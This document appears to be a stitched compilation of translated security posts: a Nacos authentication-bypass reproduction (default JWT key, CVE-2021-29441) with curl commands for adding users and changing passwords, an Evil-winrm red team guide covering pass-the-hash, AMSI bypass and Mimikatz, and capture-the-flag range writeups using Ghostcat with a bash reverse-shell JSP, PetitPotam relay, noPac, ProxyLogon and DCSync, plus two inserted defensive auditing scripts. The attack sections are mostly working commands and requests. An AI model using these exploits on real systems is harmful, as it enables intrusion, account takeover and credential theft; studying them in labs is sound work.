Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

username=crowsec&password=crowsec

At this point I got the token information:

HTTP/1.1 200
Vary: Origin
Vary: Access-Control-Request-Method
Vary: Access-Control-Request-Headers
Content-Security-Policy: script-src 'self'
Set-Cookie: JSESSIONID=D90CF6E5B233685E4A39C1B1BDA9F185; Path=/nacos; HttpOnly
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s
Content-Type: application/json
Date: Wed, 15 Mar 2023 14:13:22 GMT
Connection: close
Content-Length: 197

{"accessToken":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s","tokenTtl":18000,"globalAdmin":true,"username":"nacos"}

At this point I have the Nacos token information.

2. How to log in to the backend with the token? Log in with a fake account, then modify the returned response. Try it: log in with a fake account first and intercept with Burp. This is definitely not accessible.
Modify the response here: right-click and choose to intercept the response. Then Forward; the response returned here is certainly invalid. Replace it with the response obtained in Burp just now (copy all of it) and Forward again. Now I am in.

3. Use the default key to generate a JWT and view the current usernames and passwords:

GET /nacos/v1/auth/users?accessToken=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s&pageNo=1&pageSize=9 HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0
Accept-Encoding: gzip, deflate
Connection: close
If-Modified-Since: Wed, 15 Feb 2023 10:45:10 GMT
Upgrade-Insecure-Requests: 1
accessToken: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s

4. Use the default key to add the user hellonacos with password hellonacos; it is created successfully:

POST /nacos/v1/auth/users HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiJuYWNvcyIsImV4cCI6MTY3ODg5OTkwOX0.Di28cDY76JCvTMsgiim12c4pukjUuoBz6j6dstUKO7s
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
If-Modified-Since: Wed, 15 Feb 2023 10:45:10 GMT
Content-Type: application/x-www-form-urlencoded
Content-Length: 39

username=hellonacos&password=hellonacos

0x03 Vulnerability Reproduction
http://10.10.84.207:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate&accessToken=
http://your_ip:8848/nacos/v1/auth/users/?pageNo=1&pageSize=9

2. Nacos default configuration: unauthorized access vulnerability
Add serverIdentity.

3. Nacos 2.2.0 permission bypass
Adding serverIdentity: if it is absent or does not match, 403 is returned.

4. Nacos 1.x.x User-Agent permission bypass (CVE-2021-29441)

0x01 Vulnerability Description
In Nacos 1.4.1 and earlier, the AuthFilter servlet filter is used to enforce authentication, but it skips the authentication check for requests it takes to come from another Nacos server. This mechanism relies on the User-Agent HTTP header and is therefore easily spoofed. The issue may allow any user to perform any administrative task on the Nacos server.

0x02 Environment construction
docker run -d -p 8848:8848 hglight/cve-2021-29441

0x03 Vulnerability Impact
Nacos <= 1.4.1

0x04 Vulnerability reproduction
1. Set the User-Agent header of the request to Nacos-Server. After adding the header, visit http://target:8848/nacos/v1/auth/users?pageNo=1&pageSize=9. You can see that the return code is 200, and check whether the content contains pageItems.

GET /nacos/v1/auth/users/?pageNo=1&pageSize=9 HTTP/1.1
Host: 192.168.246.138:8848
User-Agent: Nacos-Server

Or use the command line.

Read user passwords:
curl 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&accessToken=' -H 'User-Agent: Nacos-Server'
curl 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&search=blur' -H 'User-Agent: Nacos-Server'
curl 'http://127.0.0.1:8848/nacos/v1/auth/users?pageNo=1&pageSize=9&search=accurate' -H 'User-Agent: Nacos-Server'

Unauthorized addition of a user:
curl -X POST 'http://127.0.0.1:8848/nacos/v1/auth/users?username=test1&password=test1' -H 'User-Agent: Nacos-Server'

Change any user's password:
curl -X PUT 'http://127.0.0.1:8848/nacos/v1/auth/users?accessToken=' -H 'User-Agent: Nacos-Server' -d 'username=test1&newPassword=test2'

Read configuration files:
curl -X GET 'http://127.0.0.1:8848/nacos/v1/cs/configs?search=accurate&dataId=&group=&pageNo=1&pageSize=99'
curl -X GET 'http://127.0.0.1:8848/nacos/v1/cs/configs?search=blur&dataId=&group=&pageNo=1&pageSize=99'

After adding the header, use the POST method to request http://target:8848/nacos/v1/auth/users?username=vulhub&password=vulhub, which adds a new user whose account and password are both vulhub:

POST /nacos/v1/auth/users?username=hglight&password=hglight HTTP/1.1
Host: 192.168.246.138:8848
User-Agent: Nacos-Server

or

POST /nacos/v1/auth/users HTTP/1.1
Host: 192.168.31.64:8848
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Nacos-Server
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 27

username=hglight&password=hglight

View the user list again. In the returned user list data there is an additional new user, the one we created by bypassing authentication:

GET /nacos/v1/auth/users/?pageNo=1&pageSize=9 HTTP/1.1
Host: 192.168.246.138:8848
User-Agent: Nacos-Server

Access http://IP:8848/nacos and log in with the new user; this means the vulnerability was exploited successfully.
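The defender's side of the four items above, as an added example (not code from the original post or from the Nacos project): an audit of application.properties for the hard-coded token key, the stock serverIdentity pair and disabled auth, plus a scan of access-log lines for the CVE-2021-29441 User-Agent pattern. The property names are the real Nacos ones; the 32-byte minimum key length, the sample configs, the cluster member list and the log lines are assumptions constructed for the example.

```python
"""Defensive audit for the Nacos issues above: the hard-coded token.secret.key (item 1),
the stock serverIdentity pair (items 2-3) and the User-Agent bypass of CVE-2021-29441 (item 4)."""
import base64
import binascii
import re

# Default key quoted in the post (conf/application.properties).
DEFAULT_SECRET_KEY = "SecretKey012345678901234567890123456789012345678901234567890123456789"
SECRET_KEY_PROPS = ("nacos.core.auth.plugin.nacos.token.secret.key",  # Nacos 2.2+
                    "nacos.core.auth.default.token.secret.key")       # earlier 2.x
DEFAULT_SERVER_IDENTITY = ("serverIdentity", "security")  # stock 2.0/2.1 values
MIN_KEY_BYTES = 32  # decoded key length Nacos 2.2+ expects (assumption from the docs)


def parse_properties(text):
    """Minimal Java .properties reader: key=value lines, '#'/'!' comments, no continuations."""
    props = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in "#!":
            continue
        key, sep, value = line.partition("=")
        if sep:
            props[key.strip()] = value.strip()
    return props


def audit_properties(text):
    """Return (severity, message) findings for a Nacos application.properties."""
    props = parse_properties(text)
    findings = []
    if props.get("nacos.core.auth.enabled", "false").lower() != "true":
        findings.append(("HIGH", "nacos.core.auth.enabled is not true: the API is unauthenticated"))
    key = next((props[p] for p in SECRET_KEY_PROPS if p in props), None)
    if key is None:
        findings.append(("HIGH", "no token secret key configured"))
    elif key == DEFAULT_SECRET_KEY:
        findings.append(("CRITICAL", "token secret key is the public default: anyone can mint admin JWTs"))
    else:
        try:
            decoded = base64.b64decode(key, validate=True)
            if len(decoded) < MIN_KEY_BYTES:
                findings.append(("HIGH", f"token secret key decodes to only {len(decoded)} bytes"))
        except (binascii.Error, ValueError):
            findings.append(("MEDIUM", "token secret key is not valid Base64 (Nacos 2.2+ expects Base64)"))
    ident = (props.get("nacos.core.auth.server.identity.key", ""),
             props.get("nacos.core.auth.server.identity.value", ""))
    if ident == DEFAULT_SERVER_IDENTITY:
        findings.append(("CRITICAL", "serverIdentity is the stock pair: the header can be forged"))
    elif not all(ident):
        findings.append(("HIGH", "serverIdentity key/value unset: node-to-node calls cannot be told apart"))
    return findings


# Combined-log-format line: ip, time, method, path, status, user-agent.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"')
SENSITIVE_PREFIXES = ("/nacos/v1/auth/", "/nacos/v1/cs/configs")


def find_ua_bypass(log_lines, cluster_members):
    """Flag CVE-2021-29441-style requests: User-Agent 'Nacos-Server' on auth or config
    endpoints from an address that is not a known cluster member."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = m["path"].split("?", 1)[0]
        if m["ua"] == "Nacos-Server" and path.startswith(SENSITIVE_PREFIXES) and m["ip"] not in cluster_members:
            hits.append({"ip": m["ip"], "time": m["ts"], "method": m["method"],
                         "path": path, "status": int(m["status"])})
    return hits


# Constructed sample inputs (not taken from any real deployment).
WEAK_CONFIG = """\
# modelled on a stock conf/application.properties
nacos.core.auth.enabled=false
nacos.core.auth.plugin.nacos.token.secret.key=SecretKey012345678901234567890123456789012345678901234567890123456789
nacos.core.auth.server.identity.key=serverIdentity
nacos.core.auth.server.identity.value=security
"""
EXAMPLE_KEY = base64.b64encode(bytes(range(48))).decode()  # deterministic stand-in; use `openssl rand -base64 48`
HARDENED_CONFIG = f"""\
nacos.core.auth.enabled=true
nacos.core.auth.plugin.nacos.token.secret.key={EXAMPLE_KEY}
nacos.core.auth.server.identity.key=X-Nacos-Cluster-Id
nacos.core.auth.server.identity.value=replace-with-a-long-random-value
"""
CLUSTER_MEMBERS = {"10.0.0.2", "10.0.0.3"}  # the real Nacos nodes
SAMPLE_LOG = [  # 10.0.0.2 is a legitimate peer; 203.0.113.9 is not
    '10.0.0.2 - - [15/Mar/2023:14:10:01 +0000] "GET /nacos/v1/cs/configs?dataId=app&group=DEFAULT_GROUP HTTP/1.1" 200 512 "-" "Nacos-Server"',
    '203.0.113.9 - - [15/Mar/2023:14:13:22 +0000] "GET /nacos/v1/auth/users?pageNo=1&pageSize=9 HTTP/1.1" 200 197 "-" "Nacos-Server"',
    '203.0.113.9 - - [15/Mar/2023:14:13:40 +0000] "POST /nacos/v1/auth/users HTTP/1.1" 200 2 "-" "Nacos-Server"',
    '198.51.100.7 - - [15/Mar/2023:14:15:00 +0000] "GET /nacos/index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
]
```

Running `audit_properties(WEAK_CONFIG)` yields one HIGH and two CRITICAL findings, `audit_properties(HARDENED_CONFIG)` yields none, and `find_ua_bypass(SAMPLE_LOG, CLUSTER_MEMBERS)` returns only the two 203.0.113.9 requests.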
-
Title: Red Team Tool: Evil-Winrm Detailed Guide
Foreword
Evil-winrm was originally developed by the Hackplayers team. The purpose of the tool is to simplify penetration testing as much as possible, especially in Microsoft Windows environments. Evil-winrm uses the PowerShell Remoting Protocol (PSRP); Windows Remote Management (WinRM) is the protocol that system and network administrators commonly use for upload and management tasks. WinRM is a firewall-friendly SOAP protocol used over HTTP transport, on default port 5985. For more information about PowerShell remoting, refer to the official Microsoft documentation:
https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.core/enable-psremoting?view=powershell-7.3

Introduction to Evil-winrm
Evil-winrm is an open source tool written in Ruby. It has many useful features, including remote login with a plaintext password, SSL-encrypted login, NTLM hash login, key login, file transfer, log storage and more. The author keeps updating and maintaining the tool. Using evil-winrm we obtain a PowerShell command session on the remote host. The tool is bundled with Kali Linux, but if you want to download it separately you can get it from its official git repository:
https://github.com/Hackplayers/evil-winrm

WinRM service discovery
As mentioned above, evil-winrm works against a remote host on which the WinRM service is enabled. To confirm whether the target system has WinRM enabled, we can use nmap to check whether the two default WinRM ports, 5985 and 5986, are open. From the nmap scan results we found that the WinRM service is enabled, so we can use evil-winrm to log in and perform the other tasks we will explore in the lateral movement phase.
nmap -p 5985,5986 192.168.1.19

Evil-winrm help command
To list all available features of evil-winrm, simply use the -h flag, which lists all the commands with descriptions.
evil-winrm -h

Login with a plaintext password
Suppose we obtained a plaintext password during the account enumeration phase and noticed that the remote host has WinRM enabled. We can use evil-winrm to open a remote session on the target system: the target IP goes with the -i parameter, the username with -u and the password with -p. As shown in the figure below, a remote PowerShell session has been established.
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987

Login with a plaintext password - enable SSL
As mentioned above, the WinRM service can carry traffic over HTTP; we can use the Secure Sockets Layer (SSL) feature to secure the connection. Once SSL is enabled, our data is transferred through an encrypted channel. With evil-winrm, the -S parameter establishes the connection to the remote host over SSL.
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -S

Login with an NTLM hash - pass the hash
In intranet penetration projects involving Windows privilege escalation and Active Directory, we often obtain NTLM hashes through various attack methods. In a Windows intranet environment we can use evil-winrm to create a PowerShell session by performing a pass-the-hash attack, so that the hash serves as the password instead of a plaintext password for remote login. This attack is also supported by other protocols. To pass a hash we use the -H parameter.
evil-winrm -i 192.168.1.19 -u administrator -H 32196B56FFE6F45E294117B91A83BF38

Load PowerShell scripts
Evil-winrm also lets us use PowerShell scripts from our own machine against the target host. The script is loaded directly into memory; the -s parameter takes the local directory that holds the PowerShell scripts. In addition, the tool provides the AMSI bypass we often need before importing any script. In the following example we bypass AMSI, load the Invoke-Mimikatz.ps1 script from our system into memory on the target host, and can then use the mimikatz command. For demonstration purposes we dump the cached login credentials. After dumping the credentials, we can again use the obtained NTLM hash for a pass-the-hash attack.
https://github.com/clymb3r/PowerShell/blob/master/Invoke-Mimikatz/Invoke-Mimikatz.ps1
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -s /opt/privsc/powershell
Bypass-4MSI
Invoke-Mimikatz.ps1
Invoke-Mimikatz

Storing logs using Evil-winrm
This feature saves the log of the commands executed in a remote session to our local system. When working on projects we need a record of what was run for the subsequent report. All logs can be saved to our host with the -l parameter; by default they go to the /root/evil-winrm-logs directory. In the following example we run the ipconfig command and at the same time save its output to the host system.
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -l
You can verify that the command log was stored successfully by checking the saved log content. You can see that the output of the command above has been stored.

Disable remote path completion
By default the tool comes with remote path completion, but if we want to disable it we can use the -N parameter. Whether to keep it on is a matter of personal preference; if you are happy with automatic completion, feel free to use the default.
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -N

Disable colored interface
Whenever we create a remote session with evil-winrm, a nicely colored command-line interface is generated. If we want to disable the colored interface, we can use the -n parameter when creating the session.
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -n

Run executable files
This feature solves a real problem we encounter during assessments: wanting to run an exe inside a PowerShell session in which we cannot simply drop it on the command line. Suppose we have an executable to run on the target system. The Hackplayers team added a feature to run executables inside an evil-winrm PowerShell session: the -e parameter points at the local directory of executables. In the following example the winPEASx64.exe executable is stored in the local /opt/privsc directory and is run with the additional Invoke-Binary command from the evil-winrm menu. This feature lets us execute any command-line exe binary.
evil-winrm -i 192.168.1.19 -u administrator -p Ignite@987 -e /opt/privsc
Bypass-4MSI
menu
Invoke-Binary /opt/privsc/winPEASx64.exe
Once we have set the executable path, we can use any executable that we want to run on the target system. In the example we call winPEASx64.exe and run it on the target system using evil-winrm.

Use Evil-winrm for service queries
Sometimes post-exploitation tools cannot detect the names of services running on the target system. In this case we can use evil-winrm to find the service names: go to the menu again and use the services function. It lists all services on the host.

File transfer using Evil-winrm
There is no doubt that evil-winrm does its best to make our work as simple as possible. We always need to transfer files from the attack machine to the remote machine to carry out operations, and evil-winrm provides a very practical feature for this, especially when we face outbound traffic rules on the target system or use evil-winrm through a proxy. In the following example we upload the notes.txt file from the /root directory to the target system. Files can also be downloaded from the target system to the attacker's machine; similarly, we can use the following command to download:
download notes.txt /root/raj/notes.txt

Using Evil-winrm from Docker
The tool can also be installed in Docker. If we install evil-winrm in Docker we can call it from Docker, and it runs just as it does on the main system. To do this, follow the docker syntax and the evil-winrm command to call it from Docker.
docker run --rm -ti --name evil-winrm oscarakaelvis/evil-winrm -i 192.168.1.105 -u Administrator -p 'Ignite@987'

Login with Evil-winrm using keys
Evil-winrm also allows us to establish remote sessions with public and private keys: the -k parameter takes the private key and -c the public key (certificate). In addition we can add the -S parameter to enable SSL so that our connection is encrypted.
evil-winrm -i 10.129.227.105 -c certificate.pem -k priv-key.pem -S
-
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Spoofing Writeup
0x01 – Info
Tags: Tomcat, NTLM, WebClient, Coerce Authentication, noPac

0x02 – Recon
Target external IP: 47.92.146.66
Nmap results: focus on port 8009 (AJP), which means Tomcat (matching the range's Tomcat tag). Directory scan: the 404 page identifies Tomcat 9.0.30.

Playing with Ghostcat
Test with this project: https://github.com/00theway/Ghostcat-CNVD-2020-10487
Read /WEB-INF/web.xml and save the url-pattern entries as a dictionary for ffuf. Follow the uploadservlet: upload temp.txt, and the returned file address is ./upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt. Replace ./upload with /upload and the uploaded file is read successfully:
python3 ajpShooter.py http://47.92.146.66:8080 8009 /upload/7dbbdee357b4472f5aad6b8ce83980dd/20221206093440839.txt read

0x03 – GhostCat command execution
Prepare shell.txt (the base64-encoded command is omitted here):
<% java.io.InputStream in = Runtime.getRuntime().exec("bash -c {echo,<base64 payload omitted>}|{base64,-d}|{bash,-i}").getInputStream(); int a = -1; byte[] b = new byte[2048]; out.print("<pre>"); while ((a = in.read(b)) != -1) { out.println(new String(b)); } out.print("</pre>"); %>
Upload shell.txt and execute the uploaded code. SSH in – flag01.

0x04 – Portal
Ubuntu: 172.22.11.76. Nothing over SSH;
just set up a proxy and scan 445 through it, getting the information of three hosts:
172.22.11.45 XR-Desktop.xiaorang.lab
172.22.11.6 xiaorang-dc.xiaorang.lab
172.22.11.26 XR-LCM3AE8B.xiaorang.lab
Pay attention to 172.22.11.45 – Windows 7 – MS17-010. MS17-010 is done in one go.

Basic operations
Credential list:
Administrator 4430c690b4c1ab3f4fe4f8ac0410de4a – (local credentials)
John 03cae082068e8d55ea307b75581a8859 – (local credentials)
XR-DESKTOP$ 3aa5c26b39a226ab2517d9c57ef07e3e – (domain credentials)
yangmei 25e42ef4cc0ab6a8ff9e3edbbda91841 – xrihGHgoNZQ (plaintext) – (domain credentials)
I tried spraying the combinations; there was nothing, so I skip the demonstration here and go directly to the domain penetration part.

Flag02
Add domain user yangmei to the local administrators of the machine. Determine the domain controller IP: 172.22.11.6 – xiaorang-dc. Bloodhound collection.

0x05 – Domain penetration, entrance XR-Desktop: 172.22.11.45
Let's go through this quickly (summary in one sentence: you can't directly take down the domain controller). The passwords/hashes obtained were sprayed against the usernames collected by Bloodhound; no new users were found. MAQ=0, so computers cannot be added. The current LDAP has no TLS, so computers cannot be added remotely either: impacket's addcomputer has two methods, SAMR and LDAPS; SAMR is restricted by MAQ=0 and cannot add computers, and LDAPS is restricted by the lack of TLS plus MAQ=0. The domain controller is vulnerable to noPac, but the current user yangmei cannot use it: she has no ACL rights on the domain's Computers container.
Current user yangmei does not have WriteDacl on the current Windows machine XR-Desktop, which means its SamAccountName cannot be modified in the domain. DFSCoerce and PetitPotam remain, but CVE-2019-1040 is not present, so DFSCoerce is abandoned and PetitPotam is given priority.
NoPac exploit: Ridter/noPac: Exploiting CVE-2021-42278 and CVE-2021-42287 to impersonate DA from standard domain user (github.com)
PetitPotam scan: no ADCS, so the play is PetitPotam + NTLM relay.
Attack chain: use PetitPotam to trigger the vulnerable target and enable the WebClient service; use PetitPotam to make the target access our HTTP relay service. The target uses WebClient to carry NTLM authentication to our relay; we relay that authentication to LDAP, obtain the identity of the machine account, and modify its own msDS-AllowedToActOnBehalfOfOtherIdentity attribute as that machine account, allowing our controlled machine account to impersonate users against the target machine (RBCD). The precondition is that the target machine has the WebClient service enabled. A WebClient scan confirmed that only 172.22.11.26 (XR-LCM3AE8B) can be taken this way.

Relay attack
Preface: in real engagements the relay only requires stopping whatever occupies port 80 and enabling port forwarding (portfwd; CS added rportfwd_local in later versions, forwarding directly to the client local). This demonstration mirrors the real-world approach and does not throw impacket onto the entry Ubuntu host.
Relay environment configuration: port forwarding + proxy. We currently need to forward the server's port 80 to the local client's port 80. Note: since SSH reverse port forwarding only listens on 127.0.0.1, we need some tricks here.
As shown in the figure, even when the reverse forward for port 79 is told to listen on all interfaces (-R *:79:127.0.0.1:80), port 79 is still bound to 127.0.0.1 (the socks5 proxy is also opened in the figure). Add an extra socat to forward traffic from 0.0.0.0:80 to 127.0.0.1:79, which is then forwarded back to port 80 on the client side, making port 80 appear to listen on 0.0.0.0. Test: traffic arriving at 172.22.11.76:80 is forwarded directly to our local machine.
Open ntlmrelayx locally. Note: as mentioned earlier there is no LDAPS, so you cannot use addcomputer; set RBCD instead and then connect to the DC by IP:
sudo proxychains4 -q -f proxychains.conf ntlmrelayx.py -t ldap://172.22.11.6 --no-dump --no-da --no-acl --escalate-user 'xr-desktop$' --delegate-access
Use PetitPotam to trigger XR-LCM3AE8B to authenticate to 172.22.11.76 (ubuntu):
proxychains4 -q -f ~/HTB/Spoofing/proxychains.conf python3 PetitPotam.py -u yangmei -p 'xrihGHgoNZQ' -d xiaorang.lab ubuntu@80/pwn.txt XR-LCM3AE8B
It can be seen that the RBCD attack has completed; the next step is to request a service ticket for XR-LCM3AE8B directly. Request a CIFS ticket for XR-LCM3AE8B.

0x06 – Domain penetration – NoPAC, entrance XR-LCM3AE8B: 172.22.11.26
psexec; flag03 is in C:\users\administrator\flag\flag03.txt (no screenshot here). smbclient.py pass; mimikatz obtains new credentials:
zhanghui 1232126b24cdf8c9bd2f788a9d7c7ed1
Only zhanghui works. zhanghui can create objects in the MA_Admin group, and the MA_Admin group can create computer objects, but I didn't see it in Bloodhound.
AdFind.exe -b 'CN=Computers,DC=xiaorang,DC=lab' nTSecurityDescriptor -sddl+++
Bloodhound cannot see it; the main reason is that CreateChild was not collected into the JSON. Back to noPac, adding the create-child parameter.

0x07 – Domain penetration – xiaorang-dc
Log in to the DC using the CIFS ticket obtained with noPac; flag04 is in C:\users\administrator\flag\flag04.txt (no screenshot here). Domain admin (skipped, using mimikatz): administrator 0fadb57f5ec71437d1b03eea2cda70b9

0x08 – Playing around
Try to solve the problem that Bloodhound.py cannot collect CreateChild. Bloodhound/enumeration/acls.py has actually defined the variables; they just need to be called. Go to line 170 and add it: find CreateChild and add the data. Run bloodhound.py again, observe the results for containers, and find that there is now relevant data. RID 1132 = MA_Admin group in the Bloodhound diagram, but the data is still messy.
Original link: https://www.anquanke.com/post/id/285771
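The Ghostcat entry in 0x02/0x03 above exists because Tomcat 9.0.30 exposed AJP on 8009 to the network with no shared secret. The following is an added example (not code from the post or from the Tomcat project) that audits a server.xml for exactly that: an AJP connector not bound to loopback, with no secret, on a build older than the 9.0.31 fix. The server.xml fragments are constructed; the attribute names and the 9.0.31 default change are Tomcat's own.

```python
"""Audit Tomcat's server.xml for the AJP exposure behind Ghostcat (CNVD-2020-10487 /
CVE-2020-1938): an AJP connector reachable from outside, with no shared secret."""
import xml.etree.ElementTree as ET

LOOPBACK = {"127.0.0.1", "::1", "0:0:0:0:0:0:0:1", "localhost"}
# 9.0.31 changed the AJP defaults (bind loopback, require a secret); 9.x branch only here.
SAFE_DEFAULTS_FROM = (9, 0, 31)


def version_tuple(version):
    return tuple(int(part) for part in version.split("."))


def audit_ajp_connectors(server_xml, tomcat_version):
    """Return (code, port, detail) findings for every AJP connector in server.xml."""
    new_defaults = version_tuple(tomcat_version) >= SAFE_DEFAULTS_FROM
    findings, ajp_ports = [], []
    for conn in ET.fromstring(server_xml).iter("Connector"):
        # protocol may be "AJP/1.3" or a class name such as org.apache.coyote.ajp.AjpNioProtocol
        if "ajp" not in conn.get("protocol", "HTTP/1.1").lower():
            continue
        port = conn.get("port", "?")
        ajp_ports.append(port)
        address = conn.get("address")
        # Before 9.0.31 a missing address meant "all interfaces".
        bound_loopback = new_defaults if address is None else address in LOOPBACK
        if not bound_loopback:
            findings.append(("AJP_EXPOSED", port,
                             f"bound to {address or 'all interfaces'}; bind to loopback or drop the connector"))
        # 9.0.31+ uses secret=; older builds used requiredSecret=.  Either way one must be set.
        if not (conn.get("secret") or conn.get("requiredSecret")):
            findings.append(("AJP_NO_SECRET", port, "no shared secret: any client reaching the port can speak AJP"))
    if ajp_ports and not new_defaults:
        findings.append(("AJP_OLD_VERSION", ",".join(ajp_ports),
                         f"Tomcat {tomcat_version} predates the 9.0.31 Ghostcat fix"))
    return findings


# Constructed fragments: the first matches the stock layout of the 9.0.30 target in the post.
VULNERABLE_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" redirectPort="8443"/>
  </Service>
</Server>"""
HARDENED_XML = """<Server port="8005" shutdown="SHUTDOWN">
  <Service name="Catalina">
    <Connector port="8080" protocol="HTTP/1.1" connectionTimeout="20000" redirectPort="8443"/>
    <Connector port="8009" protocol="AJP/1.3" address="127.0.0.1"
               secretRequired="true" secret="replace-with-a-long-random-secret"/>
  </Service>
</Server>"""
```

For the 9.0.30 layout the audit reports AJP_EXPOSED, AJP_NO_SECRET and AJP_OLD_VERSION; the hardened fragment on 9.0.31 reports nothing.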
-
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Delegation Writeup
0x1 Info
Range address: https://yunjing.icunqiu.com/ranking/summary?id=BzMFNFpvUDU
The range environment is complete from web to intranet to domain, and the problem design is very good. If you are interested, go and play it.

0x2 Recon
Target external IP: 39.98.34.149
Nmap results: follow the HTTP service on port 80. Directory brute-force (omitted) finds /admin. Log in to the backend with a weak password (username: admin, password: 123456), go to the template page, edit header.html and add a PHP one-liner. Command execution.

0x03 Entry point: 172.22.4.36
Shell. Quick pass: the entry machine has nothing special and cannot be escalated to root (no need to escalate to root). The stapbpf SUID could not be used. Found diff with SUID; flag01:
diff --line-format=%L /dev/null /home/flag/flag01.txt
flag01 contains a hint with the username WIN19\Adrian. Hang the proxy and scan 445 to get the information of three machines:
172.22.4.19 fileserver.xiaorang.lab
172.22.4.7 DC01.xiaorang.lab
172.22.4.45 win19.xiaorang.lab
Use the username from the flag01 hint plus rockyou.txt to brute-force, yielding valid credentials (with a prompt that the password has expired): win19\Adrian babygirl1. Use xfreerdp to log in to win19 remotely and then change the password.

0x04 Pwning WIN19 - 172.22.4.45
Preface: the current machine has no domain credentials except the machine account, so you need to escalate privileges to obtain the machine account as SYSTEM. There are hints on the desktop; follow this column.
The current user Adrian has full control over the registry. Privilege escalation: msfvenom generates a service payload; execute sam.bat. sam.bat modifies the registry and enables the service, after which sam, security and system land on the desktop. Get the Administrator + machine account credentials:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ba21c629d9fd56aff10c3e826323e6ab:
$MACHINE.ACC: aad3b435b51404eeaad3b435b51404ee:917234367460f3f2817aa4439f97e636
flag02. Collect domain information using the machine account.

0x05 DC takeover - 172.22.4.7
Analyzing Bloodhound, both WIN19 and DC01 have unconstrained delegation. Log in to WIN19 as Administrator and deploy Rubeus. Use DFSCoerce to force DC01 to authenticate back to win19 and obtain DC01's TGT; base64-decode the TGT into DC01.kirbi. DCSync to get the domain admin credentials. psexec - flag04.

0x06 Fileserver takeover - 172.22.4.19
psexec - flag03

0x07 Outro
Thanks to Master Alphabug for the tip (0x03 - 0x04); my brother had finished the entry point and I just followed in, and thanks to Master Jiu for his cooperation.
Original link: https://www.freebuf.com/articles/web/352151.html
-
Title: Spring and Autumn Cloud Mirror-[Simulation Scene] Exchange writeup
0x00 Intro
OSCP-style penetration; leaving out tools like C2 and MSF is not difficult.

0x01 Info
Tags: JDBC, Exchange, NTLM, Coerce Authentication, DCSync

0x02 Recon
Target external IP: 39.98.179.149
Nmap results: go directly to port 8000. I had already missed port 80 before; there was nothing to go on directly. Huaxia ERP has many vulnerabilities; the entry point had me stuck for a long time, until I saw JDBC and went straight to my brother's article after Googling:
Fastjson's high-version magic tricks - Bmth (bmth666.cn) (http://www.bmth666.cn/bmth_blog/2022/10/19/Fastjson%E9%AB%98%E7%89%88%E6%9C%AC%E7%9A%84%E5%A5%87%E6%8A%80%E6%B7%AB%E5%B7%A7/#%E8%93%9D%E5%B8%BD%E6%9D%AF2022%E5%86%B3%E8%B5%9B-%E8%B5%8C%E6%80%AA)
Construct the payload and configure MySQL_Fake_Server: unauthorized access + MySQL Connector JDBC deserialization, combined. Direct RCE; after the RCE, flag01 is obtained directly.

0x03 Entry point: 172.22.3.12
An SMB scan of the intranet hosts shows the Exchange keyword (EXC01); try accessing 172.22.3.9. Hit Exchange directly with ProxyLogon to obtain SYSTEM permissions; flag02 (brief credential collection follows).

0x04 Entry point: 172.22.3.9
Fast forward. 1: the hash of the Exchange machine account has been collected. 2: at the same time, a domain account credential was collected: Zhangtong. Having collected the Exchange machine account hash through the above operation: the Exchange machine account has WriteDacl permission on the entire domain object.
Then we directly use dacledit.py to add DCSync permission to Zhangtong (in fact, you can also add DCSync to yourself). DCSync to get the hashes of the domain admin and of the user Lumia; enter 172.22.3.2 to get flag04.

0x05 Final: 172.22.3.26
